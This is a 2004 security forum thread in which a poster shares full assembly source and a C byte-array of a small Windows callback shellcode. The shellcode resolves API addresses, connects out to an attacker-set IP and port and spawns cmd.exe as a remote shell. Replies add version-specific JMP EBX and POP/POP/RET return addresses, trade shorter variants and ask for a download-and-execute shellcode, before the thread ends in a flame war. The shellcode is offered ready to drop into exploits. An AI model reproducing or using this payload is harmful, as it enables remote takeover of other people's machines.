101
Dec 27 2004, 11:42 AM
Tested working on: Win2k SP4 Server Win2k SP4 Pro. WinXP SP1 Pro. WinXP SP1a Pro. WinXP SP2 Pro. and more prolly! This nice peace of code for coders restricted in space  , by brett moore and some small modifications by me to make it stable accross windows platforms. Originally modded for the netcat exploit { QUOTE(101) QUOTE(Anarchiste)
W0w!nice work!which tech do you use to make it universal? i will try to look ^^....thx again
That's more to Brett Moore thos thanx , I recall again this is his shellcode that he posted there is 1 year ago or so on a mailing list and I added some small modifications to make it working stable across all platform included into an exploit (It was working in a win32 binary, but included into an exploit as netcat , there is some cmd spawn problems, bad char and a compare string was checking an unstable byte of the port , dunno why he made it like but it was bugging, that compare string "reajusted" to a stable byte works fine) . Else to answer to your question , his shellcode does a lot of loops to scan the memory and find every api address needed as the MSVCRT.system() call wich call "cmd" once it found Connect() call. Nothing much as some other existing shellcodes , but nicely coded to be small , thanx again brett moore ! } , it will be prolly used in some more exploits, enjoy  bmoore.asmCODE
;*********************************** Christmas Shells***************************************
; Callback Shell.
; Directly set std handles and call system()
;
; 220 (DCh) bytes
;
; its not code, its antic0de
; and it works now too %-)
; Left it in tasm format.
; tasm32 -ml /m5 bmoore.asm
; tlink32 -Tpe -c -x bmoore.obj ,,, import32
;
;*********************************** Christmas Shells***************************************
; Jimminy jellicas its been jimplemented.
; Oddity,Dsp,Shammah,Santa Claus and the rest of the loco locals
; All the o/s peeps who know whats what.
;*******************************************************************************
*************
;//bmoore
;
; Tested working on Win2k SP4 Server,Pro and WinXP SP1a Pro Eng.
;//class101
.586p
locals
.model flat, stdcall
extrn ExitProcess:PROC
extrn WSAStartup:PROC
extrn WSACleanup:PROC
.data
wsadescription_len equ 256
wsasys_status_len equ 128
WSAdata struct
wVersion dw ?
wHighVersion dw ?
szDescription db wsadescription_len+1 dup (?)
szSystemStatus db wsasys_status_len+1 dup (?)
iMaxSockets dw ?
iMaxUdpDg dw ?
lpVendorInfo dw ?
WSAdata ends
wsadata WSAdata <?>
.code
;****************************************************************************
; Winsock + copy to stack code
;****************************************************************************
start:
push offset wsadata
push 0101h
call WSAStartup
or eax, eax
jz winsock_found
jmp codeend
winsock_found:
mov ebx,offset realstart
sub esp,400h
mov eax,esp
Copyit:
mov cl,byte ptr [ebx]
mov byte ptr [eax],cl
inc eax
inc ebx
cmp ebx,offset codeend
jle Copyit
jmp esp
;****************************************************************************
; This is the start of the shell code
;****************************************************************************
realstart:
jmp over_data
sockdat db 02h,01h,00h,065h
db 07fh,00h,00h,01h
hashes db 01h
dw 364Ah
db "MSVCRT",01
dw 422Ah
dw 8AD4h
db "WS2_32",01
dw 817Ch
dw 4E2Ch
over_data:
push 0ACC3575Fh
call esp
mov esi,7ffdf00ch
lodsd
push dword ptr [esi]
mov esi,[eax + 1ch]
lodsd
mov edx,[eax + 08h]
push -8
lea ebx,[edi-8]
LookupFunctions:
push esp
pop ebp
mov ecx,dword ptr [edx + 3ch]
mov esi,dword ptr [ecx + edx + 78h]
lea esi,dword ptr [esi + edx + 1ch]
mov cl,3
StoreAddress:
lodsd
add eax,edx
push eax
loop short StoreAddress
SearchStart:
dec ebx
mov esi,dword ptr [ebp - 8]
xor eax,eax
push eax
Search:
push eax
lodsd
add eax,edx
xor ecx,ecx
hashy:
add cx,word ptr [eax]
add cl,byte ptr [eax]
inc eax
cmp byte ptr [eax],01
jge hashy
pop eax
inc eax
cmp cx,[ebx]
jne Search
pop esi
xchg esi,eax
dec esi
shl esi,1
add esi,dword ptr [ebp - 0ch]
lodsw
shl eax,2
add eax,dword ptr [ebp - 4h]
xchg esi,eax
lodsd
add eax,edx
stosd
dec ebx
cmp byte ptr [ebx],01h
jne short SearchStart
leave
dec byte ptr [ebx]
sub ebx,06h
;//bmoore
cmp byte ptr [ebx-1],01h
je short Done_Finding
;//class101
push ebx
call dword ptr [edi + ebp]
xchg edx,eax
push -16
dec ebx
jne short LookupFunctions
;//bmoore
nop
nop
nop
nop
nop
nop
;//class101
Done_Finding:
xchg eax,ebp
call [EDI - 10h]
xor ecx,ecx
push ecx
push ecx
push ecx
push ecx
inc ecx
push ecx
inc ecx
push ecx
call [EDI - 08h]
xchg ecx,edi
pop edi
add edi,18h
stosd
stosd
stosd
dec ebx
dec byte ptr [ebx]
dec ebx
push ebx
push ebx
push eax
call [ecx - 0ch]
mov eax,1656E64h
sub eax,01010101h
push eax
push esp
call ebp
nop
call WSACleanup
codeend:
end start
;//bmoore
---------EOF
C FormatCODE
char scode[] =
"\xEB\x21\x02\x01"
"\x00\x00" //port
"\x00\x00\x00\x00" //ip
"\x01\x4A\x36\x4D\x53\x56"
"\x43\x52\x54\x01\x2A\x42\xD4\x8A\x57\x53\x32\x5F\x33\x32\x01\x7C"
"\x81\x2C\x4E\x68\x5F\x57\xC3\xAC\xFF\xD4\xBE\x0C\xF0\xFD\x7F\xAD"
"\xFF\x36\x8B\x70\x1C\xAD\x8B\x50\x08\x6A\xF8\x8D\x5F\xF8\x54\x5D"
"\x8B\x4A\x3C\x8B\x74\x11\x78\x8D\x74\x16\x1C\xB1\x03\xAD\x03\xC2"
"\x50\xE2\xFA\x4B\x8B\x75\xF8\x33\xC0\x50\x50\xAD\x03\xC2\x33\xC9"
"\x66\x03\x08\x02\x08\x40\x80\x38\x01\x7D\xF5\x58\x40\x66\x3B\x0B"
"\x75\xE8\x5E\x96\x4E\xD1\xE6\x03\x75\xF4\x66\xAD\xC1\xE0\x02\x03"
"\x45\xFC\x96\xAD\x03\xC2\xAB\x4B\x80\x3B\x01\x75\xC6\xC9\xFE\x0B"
"\x83\xEB\x06\x80\x7B\xFF\x01\x74\x10\x53\xFF\x14\x2F\x92\x6A\xF0"
"\x4B\x75\x9B\x90\x90\x90\x90\x90\x90\x95\xFF\x57\xF0\x33\xC9\x51"
"\x51\x51\x51\x41\x51\x41\x51\xFF\x57\xF8\x87\xCF\x5F\x83\xC7\x18"
"\xAB\xAB\xAB\x4B\xFE\x0B\x4B\x53\x53\x50\xFF\x51\xF4\xB8\x64\x6E"
"\x65\x01\x2D\x01\x01\x01\x01\x50\x54\xFF\xD5\x90";
enjoy!
extreme
Dec 27 2004, 12:08 PM
You are a pro.. Thank you for this usefull tool...
Maybe next time, you could make some kind of HTTP download shell, which would be small, stable, and wouldn't create files on desktop, like shellcode from JPEG exploit does...
Anarchiste
Dec 27 2004, 12:11 PM
W0w!nice work!which tech do you use to make it universal? i will try to look ^^....thx again
BuzzDee
Dec 27 2004, 12:20 PM
gr8 work 101! to anarchiste: this should answer ur question: CODE char jmpebx[]="\x73\x1c\x57\x7c"; file://JMP EBX - kernel32.dll - Win2k SP4 Server,Pro English
char popopret[]="\xb1\x2c\xc2\x77"; file://POP,POP,RET - msvcrt.dll - WinXP SP2,SP1a,SP1 Pro English - I finally found out XP exploitation;< greetz
101
Dec 27 2004, 12:34 PM
QUOTE(Anarchiste @ Dec 27 2004, 12:11 PM) W0w!nice work!which tech do you use to make it universal? i will try to look ^^....thx again That's more to Brett Moore thos thanx , I recall again this is his shellcode that he posted there is 1 year ago or so on a mailing list and I added some small modifications to make it working stable across all platform included into an exploit (It was working in a win32 binary, but included into an exploit as netcat , there is some cmd spawn problems, bad char and a compare string was checking an unstable byte of the port , dunno why he made it like but it was bugging, that compare string "reajusted" to a stable byte works fine) . Else to answer to your question , his shellcode does a lot of loops to scan the memory and find every api address needed as the MSVCRT.system() call wich call "cmd" once it found Connect() call. Nothing much as some other existing shellcodes , but nicely coded to be small , thanx again brett moore ! nb: sorry for my crap english , i know 
Anarchiste
Dec 28 2004, 12:26 PM
QUOTE(BuzzDee @ Dec 27 2004, 12:20 PM) to anarchiste: this should answer ur question: CODE char jmpebx[]="\x73\x1c\x57\x7c"; file://JMP EBX - kernel32.dll - Win2k SP4 Server,Pro English
char popopret[]="\xb1\x2c\xc2\x77"; file://POP,POP,RET - msvcrt.dll - WinXP SP2,SP1a,SP1 Pro English - I finally found out XP exploitation;< greetz My question was about the tech to find api adress needed, and not any exploit, your quote is about one special exploit, i know the tech to make an exploit universal, but there is different way for a shellcode to be universal, Brett Moore use loop scan, lsd use a different way, similar but different, basing on the pattern MZ, correct me if i'm wrong, but thw to reply QUOTE(101 @ Dec 27 2004, 12:34 PM) QUOTE(Anarchiste @ Dec 27 2004, 12:11 PM) W0w!nice work!which tech do you use to make it universal? i will try to look ^^....thx again That's more to Brett Moore thos thanx , I recall again this is his shellcode that he posted there is 1 year ago or so on a mailing list and I added some small modifications to make it working stable across all platform included into an exploit (It was working in a win32 binary, but included into an exploit as netcat , there is some cmd spawn problems, bad char and a compare string was checking an unstable byte of the port , dunno why he made it like but it was bugging, that compare string "reajusted" to a stable byte works fine) . Else to answer to your question , his shellcode does a lot of loops to scan the memory and find every api address needed as the MSVCRT.system() call wich call "cmd" once it found Connect() call. Nothing much as some other existing shellcodes , but nicely coded to be small , thanx again brett moore ! nb: sorry for my crap english , i know Yeah!Thx to Brett Moore!but thx you to for your interesting release, i don't use -e switch on netcat, i prefer code my tools, but i will take a look ...sorry for my crap english too
101
Dec 28 2004, 01:42 PM
QUOTE(101) QUOTE(Peter Winter-Smith)
Hi,
Also, 'cmd&', system() will execute cmd.exe, and will treat all following
the ampersand as a following set of commands, and ignore it while the
cmd.exe process exists :-)
-Peter
Yes you are right , end if I remember I already tested this way but its not stable accross all windows platforms, its as the Brett Moore original post with the char \x20, for example, if I test on win2k sp4 server it works fine, XP works fine, but it fail on Win2k SP4 Professional edition. You can test yourself I just made the tests several times The old way suggested is working on all OS mentionned , sure it takes 6 bytes more than your suggestion , but much stable Cheers and thanx anyway for notify me. Thus to say you can of course use the first way suggested by Brett Moore CODE
; Call system()
push 20646D63h ; Push cmd"\x20" on stack, null exists from above
push esp ; Location to cmd
call ebp ; Call system()
or Peter Winter-Smith CODE
; Call system()
push 26646D63h ; Push cmd"\x26" on stack, null exists from above
push esp ; Location to cmd
call ebp ; Call system()
You can down to the shellcode to 214 bytes but it will fail on all Win2k Professional edition. Don't have found yet why , the old way suggested by brett moore is still better for me , 6 more bytes and much stable
Anarchiste
Dec 30 2004, 11:29 AM
It's nice to know that, thx for info
guy12
Dec 30 2004, 01:58 PM
QUOTE You are a pro.. Thank you for this usefull tool...
yes a pro in code ripping everywhere i read you lame postings, with 1 year old codes! everybody knows this shellcode....so don't waste your time
101
Dec 30 2004, 02:27 PM
QUOTE(101) I recall again this is his shellcode that he posted there is 1 year ago or so on a mailing list
Looks like guy12, you are a retarded wich dont know to read. I have already mentionned 10000x times this is Brett Moore shellcode. Now I have a suggestion to you , take the shellcode from the mailing list , build the netcat exploit with (of course your own exploit), do all this working then we will speak, else you have successfully submitted a Poc on your stupidity there QUOTE(101) I added some small modifications to make it working stable across all platform included into an exploit (It was working in a win32 binary, but included into an exploit as netcat , there is some cmd spawn problems, bad char and a compare string was checking an unstable byte of the port...
I guess so that you are a noob and you not tried the buggy shellcode into an exploit but only compiled into a win32 binary. Sorry for owning you take it nicely Bye
guy12
Dec 30 2004, 03:31 PM
QUOTE I guess so that you are a noob and you not tried the buggy shellcode into an exploit
what?? i think i waste my time with you ... QUOTE --------------------
Don't forget that netcat 1.10 is vulnerable hat-squad.com/en/000142.html
--------------------
Don't forget to use netcat v1.11 vulnwatch.org/netcat
--------------------
Realtime Security News from 27 websites, 47 rsslinks => #n3ws (EFnet)
--------------------
because you are too narcissistically........ why do you add such a signature ?? do you think is so hard to code a simple bof... it is always the same overflow a seh/or ret then jump to a j mp reg or pop pop reg to the shellcode and ?? i and many people have written a few exploits ,too, but nobody adds a sig. under every post with " HEY I CAN CODE A SIMPLE POC" ... maybe someday you grow up...you don't need to answer , it is ok .....
101
Dec 30 2004, 03:49 PM
I simply told you to post a code, you answer me the color of my hairs,
discussion closed for me .
Bye!!!
Anarchiste
Dec 30 2004, 04:17 PM
QUOTE(guy12 @ Dec 30 2004, 03:31 PM) QUOTE I guess so that you are a noob and you not tried the buggy shellcode into an exploit
what?? i think i waste my time with you ... QUOTE --------------------
Don't forget that netcat 1.10 is vulnerable hat-squad.com/en/000142.html
--------------------
Don't forget to use netcat v1.11 vulnwatch.org/netcat
--------------------
Realtime Security News from 27 websites, 47 rsslinks => #n3ws (EFnet)
--------------------
because you are too narcissistically........ why do you add such a signature ?? do you think is so hard to code a simple bof... it is always the same overflow a seh/or ret then jump to a j mp reg or pop pop reg to the shellcode and ?? i and many people have written a few exploits ,too, but nobody adds a sig. under every post with " HEY I CAN CODE A SIMPLE POC" ... maybe someday you grow up...you don't need to answer , it is ok ..... Encore un qui a fait une overdose de buche glacée... 101 share his knowledge, apparently you are not for full disclosure, its your right, but i think someone must be reward for his work, so if you open the discussion, give us an exemple of your skills, or shut your mouse(i don't want be censured ), maybe you are an elite, so this forum isn't interesting for you apparently. Have a nice day, 31337 (Wah0o! i saw an elite!! damn!I have an orgasm!)
u533m3n0t
Dec 30 2004, 04:23 PM
Guy12,
Didn't your mother teach you that if you don't have anything constructive or nice to say then don't say it? It's very easy to criticize. Takes effort to improve things or contribute. I hope that you are able to find that within you which is so weak you need to flame others to make yourself feel better. Good luck.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
|
